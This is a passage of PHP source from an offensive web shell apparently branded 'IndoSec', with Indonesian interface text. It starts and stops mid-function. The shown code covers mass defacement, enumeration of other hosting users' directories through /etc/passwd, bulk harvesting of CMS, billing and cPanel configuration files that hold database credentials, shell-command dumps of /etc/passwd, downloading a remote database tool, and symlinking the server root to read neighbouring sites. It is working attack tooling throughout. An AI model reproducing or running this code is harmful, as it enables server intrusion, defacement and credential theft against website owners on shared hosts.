echo "<form method='post'>\n\t\t\t\t<center>\n\t\t\t\t\t<h5>Tipe :</h5>\n\t\t\t\t\t<input id='toggle-on' class='toggle toggle-left' name='tipe' value='murah' type='radio' checked>\n\t\t\t\t\t<label for='toggle-on' class='butn'>Biasa</label>\n\t\t\t\t\t<input id='toggle-off' class='toggle toggle-right' name='tipe' value='mahal' type='radio'>\n\t\t\t\t\t<label for='toggle-off' class='butn'>Masal</label>\n\t\t\t\t</center> \n\t\t\t\t<h5><i class='fa fa-folder'></i> Lokasi :</h5>\n\t\t\t\t<input type='text' name='d_dir' value='{$dir}' class='form-control'><br>\n\t\t\t\t<h5><i class ='fa fa-file'></i> Nama File :</h5>\n\t\t\t\t<input type='text' name='d_file' autocomplete='off' placeholder='[Ex] index.php' class='form-control'><br/>\n\t\t\t\t<h5><i class ='fa fa-file'></i> Isi File :</h5>\n\t\t\t\t<textarea name='script' class='form-control' rows='5' autocomplete='off' placeholder='[Ex] Hacked By { IndoSec }'></textarea><br/>\n\t\t\t\t<input type='submit' name='start' value='Mass Deface' class='btn btn-danger form-control'><br/>\n\t\t\t</form>";
}
die;
}
if ($_GET["aksi"] == "jumping") {
$i = 0;
echo "<div class='card container'>";
if (preg_match("/hsphere/", $dir)) {
$urls = explode("\r\n", $_POST["url"]);
if (isset($_POST["jump"])) {
echo "<pre>";
foreach ($urls as $url) {
$url = str_replace(array("http://", "www."), '', strtolower($url));
$etc = "/etc/passwd";
$f = fopen($etc, "r");
while ($gets = fgets($f)) {
$pecah = explode(":", $gets);
$user = $pecah[0];
$dir_user = "/hsphere/local/home/{$user}";
if (is_dir($dir_user) === true) {
$url_user = $dir_user . "/" . $url;
if (is_readable($url_user)) {
$i++;
$jrw = "[<font color=green>R</font>] <a href='?dir={$url_user}'><font color=#0046FF>{$url_user}</font></a>";
if (is_writable($url_user)) {
$jrw = "[<font color=green>RW</font>] <a href='?dir={$url_user}'><font color=#0046FF>{$url_user}</font></a>";
}
echo $jrw . "<br>";
}
}
}
}
if ($i == 0) {
} else {
echo "<br>Total ada " . $i . " Kamar di " . $ip;
}
echo "</pre>";
} else {
echo "<center>\n\t\t\t\t\t <form method=\"post\">\n\t\t\t\t\t List Domains: <br>\n\t\t\t\t\t <textarea name=\"url\" class=\"form-control\">";
$fp = fopen("/hsphere/local/config/httpd/sites/sites.txt", "r");
while ($getss = fgets($fp)) {
echo $getss;
}
echo "</textarea><br>\n\t\t\t\t\t <input type=\"submit\" value=\"Jumping\" name=\"jump\" style=\"width: 500px; height: 25px;\">\n\t\t\t\t\t </form></center>";
}
} elseif (preg_match("/vhosts/", $dir)) {
$urls = explode("\r\n", $_POST["url"]);
if (isset($_POST["jump"])) {
echo "<pre>";
foreach ($urls as $url) {
$web_vh = "/var/www/vhosts/{$url}/httpdocs";
if (is_dir($web_vh) === true) {
if (is_readable($web_vh)) {
$i++;
$jrw = "[<font color=green>R</font>] <a href='?dir={$web_vh}'><font color=#0046FF>{$web_vh}</font></a>";
if (is_writable($web_vh)) {
$jrw = "[<font color=green>RW</font>] <a href='?dir={$web_vh}'><font color=#0046FF>{$web_vh}</font></a>";
}
echo $jrw . "<br>";
}
}
}
if ($i == 0) {
} else {
echo "<br>Total ada " . $i . " Kamar di " . $ip;
}
echo "</pre>";
} else {
echo "<center>\n\t\t\t\t\t <form method=\"post\">\n\t\t\t\t\t List Domains: <br>\n\t\t\t\t\t <textarea name=\"url\" class=\"form-control\">";
bing("ip:{$ip}");
echo "</textarea><br>\n\t\t\t\t\t <input type=\"submit\" value=\"Jumping\" name=\"jump\" style=\"width: 500px; height: 25px;\">\n\n\t\t\t\t\t </form></center>";
}
} else {
echo "<pre>";
$etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font><br/>");
while ($passwd = fgets($etc)) {
if ($passwd == '' || !$etc) {
echo "<font color=red>Can't read /etc/passwd</font><br/>";
} else {
preg_match_all("/(.*?):x:/", $passwd, $user_jumping);
foreach ($user_jumping[1] as $user_pro_jump) {
$user_jumping_dir = "/home/{$user_pro_jump}/public_html";
if (is_readable($user_jumping_dir)) {
$i++;
$jrw = "[<font color=green>R</font>] <a href='?dir={$user_jumping_dir}'><font color=#0046FF>{$user_jumping_dir}</font></a>";
if (is_writable($user_jumping_dir)) {
$jrw = "[<font color=green>RW</font>] <a href='?dir={$user_jumping_dir}'><font color=#0046FF>{$user_jumping_dir}</font></a>";
}
echo $jrw;
if (function_exists("posix_getpwuid")) {
$domain_jump = file_get_contents("/etc/named.conf");
if ($domain_jump == '') {
echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
} else {
preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
foreach ($domains_jump[1] as $dj) {
$user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/{$dj}"));
$user_jumping_url = $user_jumping_url["name"];
if ($user_jumping_url == $user_pro_jump) {
echo " => ( <u>{$dj}</u> )<br>";
break;
}
}
}
} else {
echo "<br>";
}
}
}
}
}
if ($i == 0) {
} else {
echo "<br>Total ada " . $i . " Kamar di " . $ip;
}
echo "</pre>";
}
echo "</div><br/>";
die;
}
if ($_GET["aksi"] == "config") {
if ($_POST) {
$passwd = $_POST["passwd"];
mkdir("indosec_config", 511);
$isi_htc = "Options allnRequire NonenSatisfy Any";
$htc = fopen("indosec_config/.htaccess", "w");
fwrite($htc, $isi_htc);
preg_match_all("/(.*?):x:/", $passwd, $user_config);
foreach ($user_config[1] as $user_con) {
$user_config_dir = "/home/{$user_con}/public_html/";
if (is_readable($user_config_dir)) {
$grab_config = array("/home/{$user_con}/.my.cnf" => "cpanel", "/home/{$user_con}/public_html/config/koneksi.php" => "Lokomedia", "/home/{$user_con}/public_html/forum/config.php" => "phpBB", "/home/{$user_con}/public_html/sites/default/settings.php" => "Drupal", "/home/{$user_con}/public_html/config/settings.inc.php" => "PrestaShop", "/home/{$user_con}/public_html/app/etc/local.xml" => "Magento", "/home/{$user_con}/public_html/admin/config.php" => "OpenCart", "/home/{$user_con}/public_html/application/config/database.php" => "Ellislab", "/home/{$user_con}/public_html/vb/includes/config.php" => "Vbulletin", "/home/{$user_con}/public_html/includes/config.php" => "Vbulletin", "/home/{$user_con}/public_html/forum/includes/config.php" => "Vbulletin", "/home/{$user_con}/public_html/forums/includes/config.php" => "Vbulletin", "/home/{$user_con}/public_html/cc/includes/config.php" => "Vbulletin", "/home/{$user_con}/public_html/inc/config.php" => "MyBB", "/home/{$user_con}/public_html/includes/configure.php" => "OsCommerce", "/home/{$user_con}/public_html/shop/includes/configure.php" => "OsCommerce", "/home/{$user_con}/public_html/os/includes/configure.php" => "OsCommerce", "/home/{$user_con}/public_html/oscom/includes/configure.php" => "OsCommerce", "/home/{$user_con}/public_html/products/includes/configure.php" => "OsCommerce", "/home/{$user_con}/public_html/cart/includes/configure.php" => "OsCommerce", "/home/{$user_con}/public_html/inc/conf_global.php" => "IPB", "/home/{$user_con}/public_html/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/wp/test/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/blog/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/beta/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/portal/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/site/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/wp/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/WP/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/news/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/wordpress/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/test/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/demo/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/home/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/v1/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/v2/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/press/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/new/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/blogs/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/configuration.php" => "Joomla", "/home/{$user_con}/public_html/blog/configuration.php" => "Joomla", "/home/{$user_con}/public_html/submitticket.php" => "^WHMCS", "/home/{$user_con}/public_html/cms/configuration.php" => "Joomla", "/home/{$user_con}/public_html/beta/configuration.php" => "Joomla", "/home/{$user_con}/public_html/portal/configuration.php" => "Joomla", "/home/{$user_con}/public_html/site/configuration.php" => "Joomla", "/home/{$user_con}/public_html/main/configuration.php" => "Joomla", "/home/{$user_con}/public_html/home/configuration.php" => "Joomla", "/home/{$user_con}/public_html/demo/configuration.php" => "Joomla", "/home/{$user_con}/public_html/test/configuration.php" => "Joomla", "/home/{$user_con}/public_html/v1/configuration.php" => "Joomla", "/home/{$user_con}/public_html/v2/configuration.php" => "Joomla", "/home/{$user_con}/public_html/joomla/configuration.php" => "Joomla", "/home/{$user_con}/public_html/new/configuration.php" => "Joomla", "/home/{$user_con}/public_html/WHMCS/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/whmcs1/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Whmcs/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/whmcs/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/whmcs/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/WHMC/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Whmc/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/whmc/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/WHM/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Whm/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/whm/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/HOST/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Host/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/host/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/SUPPORTES/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Supportes/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/supportes/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/domains/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/domain/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Hosting/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/HOSTING/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/hosting/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/CART/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Cart/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/cart/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/ORDER/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Order/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/order/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/CLIENT/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Client/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/client/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/CLIENTAREA/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Clientarea/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/clientarea/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/SUPPORT/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Support/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/support/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/BILLING/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Billing/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/billing/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/BUY/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Buy/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/buy/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/MANAGE/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Manage/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/manage/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/ClientSupport/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Clientsupport/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/clientsupport/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/CHECKOUT/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Checkout/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/checkout/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/BILLINGS/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Billings/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/billings/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/BASKET/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Basket/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/basket/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/SECURE/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Secure/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/secure/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/SALES/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Sales/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/sales/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/BILL/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Bill/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/bill/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/PURCHASE/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Purchase/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/purchase/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/ACCOUNT/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Account/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/account/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/USER/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/User/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/user/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/CLIENTS/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Clients/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/clients/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/BILLINGS/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Billings/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/billings/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/MY/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/My/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/my/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/secure/whm/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/secure/whmcs/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/panel/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/clientes/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/cliente/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/support/order/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/boxbilling/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/box/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/host/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/Host/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/supportes/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/support/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/hosting/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/cart/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/order/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/client/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/clients/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/cliente/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/clientes/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/billing/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/billings/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/my/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/secure/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/support/order/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/includes/dist-configure.php" => "Zencart", "/home/{$user_con}/public_html/zencart/includes/dist-configure.php" => "Zencart", "/home/{$user_con}/public_html/products/includes/dist-configure.php" => "Zencart", "/home/{$user_con}/public_html/cart/includes/dist-configure.php" => "Zencart", "/home/{$user_con}/public_html/shop/includes/dist-configure.php" => "Zencart", "/home/{$user_con}/public_html/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/hostbills/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/host/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/Host/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/supportes/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/support/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/hosting/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/cart/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/order/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/client/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/clients/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/cliente/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/clientes/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/billing/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/billings/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/my/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/secure/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/support/order/includes/iso4217.php" => "Hostbills");
foreach ($grab_config as $config => $nama_config) {
$ambil_config = file_get_contents($config);
if ($ambil_config == '') {
} else {
$file_config = fopen("indosec_config/{$user_con}-{$nama_config}.txt", "w");
fputs($file_config, $ambil_config);
}
}
}
}
echo "<p class='text-center'>Success Get Config!!</p>\n\t\t\t<a href='?dir={$dir}/indosec_config' class='btn btn-success btn-block mb-4'>Click Here</a>";
} else {
echo "<form method='post'>\n\t\t\t\t<p class='text-danger'>/etc/passw error ? <a href='?dir=" . $dir . "&aksi=passwbypass'>Bypass Here</a></p>\n\t\t\t\t<textarea name='passwd' class='form-control' rows='10'>" . file_get_contents("/etc/passwd") . "</textarea><br/>\n\t\t\t\t<input type='submit' class='btn btn-danger btn-block' value='Get Config!!'>";
}
die;
}
if ($_GET["aksi"] == "passwbypass") {
echo "<div claas=\"container\">\n\t\t\t<form method=\"POST\">\n\t\t\t\t<p class=\"text-center\">Bypass etc/passwd With :</p>\n\t\t\t\t<div class=\"d-flex justify-content-center flex-wrap\">\n\t\t\t\t\t<input type=\"submit\" class=\"fiture btn btn-danger btn-sm\" value=\"System Function\" name=\"syst\">\n\t\t\t\t\t<input type=\"submit\" class=\"fiture btn btn-danger btn-sm\" value=\"Passthru Function\" name=\"passth\">\n\t\t\t\t\t<input type=\"submit\" class=\"fiture btn btn-danger btn-sm\" value=\"Exec Function\" name=\"ex\">\n\t\t\t\t\t<input type=\"submit\" class=\"fiture btn btn-danger btn-sm\" value=\"Shell_exec Function\" name=\"shex\">\n\t\t\t\t\t<input type=\"submit\" class=\"fiture btn btn-danger btn-sm\" value=\"Posix_getpwuid Function\" name=\"melex\">\n\t\t\t\t</div><hr/>\n\t\t\t\t<p class=\"text-center\">Bypass User With :</p>\n\t\t\t\t<div class=\"d-flex justify-content-center flex-wrap\">\n\t\t\t\t\t<input type=\"submit\" class=\"fiture btn btn-warning btn-sm\" value=\"Awk Program\" name=\"awkuser\">\n\t\t\t\t\t<input type=\"submit\" class=\"fiture btn btn-warning btn-sm\" value=\"System Function\" name=\"systuser\">\n\t\t\t\t\t<input type=\"submit\" class=\"fiture btn btn-warning btn-sm\" value=\"Passthru Function\" name=\"passthuser\">\t\n\t\t\t\t\t<input type=\"submit\" class=\"fiture btn btn-warning btn-sm\" value=\"Exec Function\" name=\"exuser\">\t\t\n\t\t\t\t\t<input type=\"submit\" class=\"fiture btn btn-warning btn-sm\" value=\"Shell_exec Function\" name=\"shexuser\">\n\t\t\t\t</div>\n\t\t\t</form>";
$mail = "ls /var/mail";
$paswd = "/etc/passwd";
if ($_POST["syst"]) {
echo "<textarea class='form-control' rows='13'>";
echo system("cat /etc/passwd");
echo "</textarea><br/>";
}
if ($_POST["passth"]) {
echo "<textarea class='form-control' rows='13'>";
echo passthru("cat {$paswd}");
echo "</textarea><br/>";
}
if ($_POST["ex"]) {
echo "<textarea class='form-control' rows='13'>";
echo exec("cat {$paswd};");
echo "</textarea><br/>";
}
if ($_POST["shex"]) {
echo "<textarea class='form-control' rows='13'>";
echo shell_exec("cat {$paswd}");
echo "</textarea><br/>";
}
if ($_POST["melex"]) {
echo "<textarea class='form-control' rows='13'>";
for ($uid = 0; $uid < 60000; $uid++) {
$ara = posix_getpwuid($uid);
if (!empty($ara)) {
while (list($key, $val) = each($ara)) {
print "{$val}:";
}
print "n";
}
}
echo "</textarea><br/>";
}
if ($_POST["awkuser"]) {
echo "<textarea class='form-control' rows='13'>\n\t\t\t\t" . shell_exec("awk -F: '{ print \$1 }' {$paswd} | sort") . "\n\t\t\t\t</textarea><br/>";
}
if ($_POST["systuser"]) {
echo "<textarea class='form-control' rows='13'>";
echo system("{$mail}");
echo "</textarea><br>";
}
if ($_POST["passthuser"]) {
echo "<textarea class='form-control' rows='13'>";
echo passthru("{$mail}");
echo "</textarea><br>";
}
if ($_POST["exuser"]) {
echo "<textarea class='form-control' rows='13'>";
echo exec($mail);
echo "</textarea><br>";
}
if ($_POST["shexuser"]) {
echo "<textarea class='form-control' rows='13'>";
echo shell_exec("{$mail}");
echo "</textarea><br>";
}
echo "</div>";
die;
}
if ($_GET["aksi"] == "adminer") {
$full = str_replace($_SERVER["DOCUMENT_ROOT"], '', $path);
function adminer($url, $isi)
{
$fp = fopen($isi, "w");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FILE, $fp);
return curl_exec($ch);
}
if (file_exists("adminer.php")) {
echo "<a href='{$full}/adminer.php' target='_blank' class='text-center btn btn-success btn-block mb-3'>Login Adminer</a>";
} else {
if (adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php", "adminer.php")) {
echo "<a href='{$full}/adminer.php' target='_blank' class='text-center btn btn-success btn-block mb-3'>Login Adminer</a>";
} else {
echo "<p class='text-center text-danger'>Gagal Membuat Adminer</p>";
}
}
die;
}
if ($_GET["aksi"] == "symlink") {
$full = str_replace($_SERVER["DOCUMENT_ROOT"], '', $path);
$d0mains = @file("/etc/named.conf");
if (!$d0mains) {
die("[ <a href='?dir={$path}&aksi=symread'>Bypass Read</a> ] [ <a href='?dir={$path}&aksi=sym_404'>Symlink 404</a> ] [ <a href='?dir={$path}&aksi=sym_bypas'>Symlink Bypass</a> ]<br/><font color='red'>Error tidak dapat membaca /etc/named.conf</font><br/><br/>");
}
if ($d0mains) {
@mkdir("indsc_sym", 511);
@chdir("indsc_sym");
@exe("ln -s / root");
$file3 = "Options Indexes FollowSymLinks\n\t\t\tDirectoryIndex indsc.html\n\t\t\tAddType text/plain .php\n\t\t\tAddHandler text/plain .php\n\t\t\tSatisfy Any";
$fp3 = fopen(".htaccess", "w");
$fw3 = fwrite($fp3, $file3);
@fclose($fp3);
echo "[ <a href='?dir={$path}&aksi=symread'>Bypass Read</a> ] [ <a href='?dir={$path}&aksi=sym_404'>Symlink 404</a> ] [ <a href='?dir={$path}&aksi=sym_bypas'>Symlink Bypass</a> ]\n\t\t\t<div class='tmp'>\n\t\t\t<table class='text-center table-responsive'>\n\t\t\t\t<thead class='bg-info'>\n\t\t\t\t\t<th>No.</th>\n\t\t\t\t\t<th>Domains</th>\n\t\t\t\t\t<th>Users</th>\n\t\t\t\t\t<th>symlink </th>\n\t\t\t\t</thead>";
$dcount = 1;
foreach ($d0mains as $d0main) {
if (eregi("zone", $d0main)) {
preg_match_all("#zone \"(.*)\"#", $d0main, $domains);
flush();
if (strlen(trim($domains[1][0])) > 2) {
$user = posix_getpwuid(@fileowner("/etc/valiases/" . $domains[1][0]));
echo "<tr>\n\t\t\t\t\t\t\t\t<td>" . $dcount . "</td>\n\t\t\t\t\t\t\t\t<td class='text-left'><a href=http://www." . $domains[1][0] . "/>" . $domains[1][0] . "</a></td>\n\t\t\t\t\t\t\t\t<td>" . $user["name"] . "</td>\n\t\t\t\t\t\t\t\t<td><a href='{$full}/indsc_sym/root/home/" . $user["name"] . "/public_html' target='_blank'>Symlink</a></td>\n\t\t\t\t\t\t\t</tr>";
flush();
$dcount++;
}
}
}
echo "</table></div>";
} else {
$TEST = @file("/etc/passwd");
if ($TEST) {
@mkdir("indsc_sym", 511);
@chdir("indsc_sym");
@exe("ln -s / root");
$file3 = "Options Indexes FollowSymLinks\n\t\t\t\tDirectoryIndex indsc.html\n\t\t\t\tAddType text/plain .php\n\t\t\t\tAddHandler text/plain .php\n\t\t\t\tSatisfy Any";
$fp3 = fopen(".htaccess", "w");
$fw3 = fwrite($fp3, $file3);
@fclose($fp3);
echo "[ <a href='?dir={$path}&aksi=symread'>Bypass Read</a> ] [ <a href='?dir={$path}&aksi=sym_404'>Symlink 404</a> ] [ <a href='?dir={$path}&aksi=sym_bypas'>Symlink Bypass</a> ]\n\t\t\t\t<div class='tmp'>\n\t\t\t\t<table class='text-center table-responsive'>\n\t\t\t\t\t<thead class='bg-warning'>\n\t\t\t\t\t\t<th>No.</th>\n\t\t\t\t\t\t<th>Users</th>\n\t\t\t\t\t\t<th>symlink </th>\n\t\t\t\t\t</thead>";
$dcount = 1;
$file = fopen("/etc/passwd", "r") or die("Unable to open file!");
while (!feof($file)) {
$s = fgets($file);
$matches = array();
$t = preg_match("/\\/(.*?)\\:\\//s", $s, $matches);
$matches = str_replace("home/", '', $matches[1]);
if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") {
continue;
}
echo "<tr>\n\t\t\t\t\t\t\t<td>" . $dcount . "</td>\n\t\t\t\t\t\t\t<td>" . $matches . "</td>\n\t\t\t\t\t\t\t<td><a href={$full}/indsc_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td>\n\t\t\t\t\t\t</tr>";
$dcount++;
}
fclose($file);
echo "</table></div>";
} else {
if ($os != "Windows") {
@mkdir("indsc_sym", 511);
@chdir("indsc_sym");
@exe("ln -s / root");
$file3 = "Options Indexes FollowSymLinks\n\t\t\t\tDirectoryIndex indsc.html\n\t\t\t\tAddType text/plain .php\n\t\t\t\tAddHandler text/plain .php\n\t\t\t\tSatisfy Any";
$fp3 = fopen(".htaccess", "w");
$fw3 = fwrite($fp3, $file3);
@fclose($fp3);
echo "[ <a href='?dir={$path}&aksi=symread'>Bypass Read</a> ] [ <a href='?dir={$path}&aksi=sym_404'>Symlink 404</a> ] [ <a href='?dir={$path}&aksi=sym_bypas'>Symlink Bypass</a> ]\n\t\t\t\t<div class='tmp'>\n\t\t\t\t<table class='text-center table-responsive'>\n\t\t\t\t\t<thead class='bg-danger'>\n\t\t\t\t\t\t<th>ID.</th>\n\t\t\t\t\t\t<th>Users</th>\n\t\t\t\t\t\t<th>symlink </th>\n\t\t\t\t\t</thead>";
$temp = '';
$val1 = 0;
$val2 = 1000;
for (; $val1 <= $val2; $val1++) {
$uid = @posix_getpwuid($val1);
if ($uid) {
$temp .= join(":", $uid) . "\n";
}
}
echo "<br/>";
$temp = trim($temp);
$file5 = fopen("test.txt", "w");
fputs($file5, $temp);
fclose($file5);
$dcount = 1;
$file = fopen("test.txt", "r") or die("Unable to open file!");
while (!feof($file)) {
$s = fgets($file);
$matches = array();
$t = preg_match("/\\/(.*?)\\:\\//s", $s, $matches);
$matches = str_replace("home/", '', $matches[1]);
if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") {
continue;
}
echo "<tr>\n\t\t\t\t\t\t\t<td>" . $dcount . "</td>\n\t\t\t\t\t\t\t<td>" . $matches . "</td>\n\t\t\t\t\t\t\t<td><a href={$full}/indsc_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td>\n\t\t\t\t\t\t</tr>";
$dcount++;
}
fclose($file);
echo "</table></div>";
unlink("test.txt");
}
}
}
die;
}
if ($_GET["aksi"] == "symread") {
echo "read /etc/named.conf";
echo "<form method='post' action='?dir={$dir}&aksi=symread&save=1'>\n\t\t\t<textarea class='form-control' rows='8' name='file'>";
flush();
flush();
